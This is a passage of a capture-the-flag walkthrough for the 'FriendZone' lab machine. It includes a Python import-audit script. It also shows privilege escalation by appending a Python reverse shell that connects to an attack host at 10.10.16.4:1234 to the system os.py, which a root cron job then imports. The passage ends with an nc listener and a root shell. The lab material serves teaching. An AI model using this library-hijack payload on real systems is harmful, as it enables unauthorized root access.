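        tree = ast.parse(source, filename=script_path)
    except SyntaxError:
        for m in IMPORT_RE.finditer(source):
            if m.group("mods"):
                names.update(x.strip().split(".")[0] for x in m.group("mods").split(","))
            elif not m.group("frm").startswith("."):
                names.add(m.group("frm").split(".")[0])
        return sorted(names)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def resolve(name, search_path):
    """First 'name.py' or 'name/__init__.py' on the path, plus the index it was found at."""
    for idx, directory in enumerate(search_path):
        for candidate in (os.path.join(directory, name + ".py"),
                          os.path.join(directory, name, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate, idx
    return None, len(search_path)


def audit(script_path, search_path=None):
    """For each import: where it resolves, whether that file is writable by us, and which
    directories earlier on the path are writable (a shadow module dropped there wins)."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    path = [script_dir] + [p for p in (sys.path if search_path is None else search_path) if p]
    findings = []
    for name in imported_names(script_path):
        location, idx = resolve(name, path)
        findings.append({
            "module": name,
            "path": location,
            "writable": bool(location) and os.access(location, os.W_OK),
            "shadow_dirs": [d for d in path[:idx] if os.path.isdir(d) and os.access(d, os.W_OK)],
        })
    return findings


def report(findings):
    """One line per import, flagging anything we could tamper with."""
    lines = []
    for f in findings:
        flag = "WRITABLE" if f["writable"] else ("SHADOWABLE" if f["shadow_dirs"] else "ok")
        lines.append("%-12s %-10s %s" % (f["module"], flag, f["path"] or "(not found on path)"))
        for d in f["shadow_dirs"]:
            lines.append("%-23s could drop %s.py in %s" % ("", f["module"], d))
    return lines


def demo():
    """Build a throwaway Python 2 style 'reporter.py' that imports os and a local helper, then audit it."""
    with tempfile.TemporaryDirectory() as workdir:
        with open(os.path.join(workdir, "helper_lib.py"), "w") as fh:
            fh.write("def run():\n    return 'ok'\n")
        script = os.path.join(workdir, "reporter.py")
        with open(script, "w") as fh:
            fh.write('#!/usr/bin/python\nimport os\nimport helper_lib\nprint "[+] %s" % helper_lib.run()\n')
        return audit(script)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print("\n".join(report(audit(target) if target else demo())))
```

On the box, python3 audit.py /opt/server_admin/reporter.py with search_path taken from /usr/bin/python's sys.path flags os as WRITABLE, which is the finding above; the SHADOWABLE case would show up if /opt/server_admin itself were writable, since that directory is searched before /usr/lib/python2.7.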

I tried editing os.py with vi but the terminal was a bit screwed up. Here's a way to fix it (courtesy of ippsec): run stty -a in a terminal on the attack machine to read its size, then set the same rows and columns inside the reverse shell:

friend@FriendZone:/usr/lib/python2.7$ stty -a 
speed 38400 baud; rows 51; columns 97; line = 0;
intr = ^C; quit = ^\; erase = ^H; kill = ^U; eof = ^D; eol = M-^?; eol2 = M-^?; swtch = <undef>;
start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O;
min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl -ixon -ixoff -iuclc -ixany
-imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho
-extproc
friend@FriendZone:/usr/lib/python2.7$ stty rows 29 columns 113

Even after this, vi was still a bit glitchy, so instead I pulled os.py down to the attack machine over SMB (via the writable Development share), appended the reverse shell there and pushed it back to /usr/lib/python2.7/os.py. Appending with a heredoc (cat >> os.py <<'EOF' ... EOF) would have avoided the editor entirely. Add the following to the bottom of os.py:

# appended to the end of /usr/lib/python2.7/os.py: runs on every `import os`
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));   # attack machine and the port nc listens on
dup2(s.fileno(),0);               # bare dup2 works here because os.py does `from posix import *`
dup2(s.fileno(),1); 
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Two caveats: s.connect() raises if the listener isn't up, which breaks `import os` (and with it nearly every Python program on the box) until the file is restored, so keep the listener running and put the original os.py back once you have root; and every Python process that imports os will connect back, not only the cron job, so check id on each shell you receive.

Setup a listener on the attack machine.

┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$  nc -lnvp 1234   

Wait for the scheduled task to run reporter.py; its `import os` pulls in the modified module and executes our reverse shell. Confirm the tail of os.py on the target first (output cut to the appended lines):

friend@FriendZone:/usr/lib/python2.7$ cat os.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0); 
dup2(s.fileno(),1); 
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

We get back a shell running with root privileges! Grab the root.txt flag.

# whoami
root

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt
612f35-----------------------------
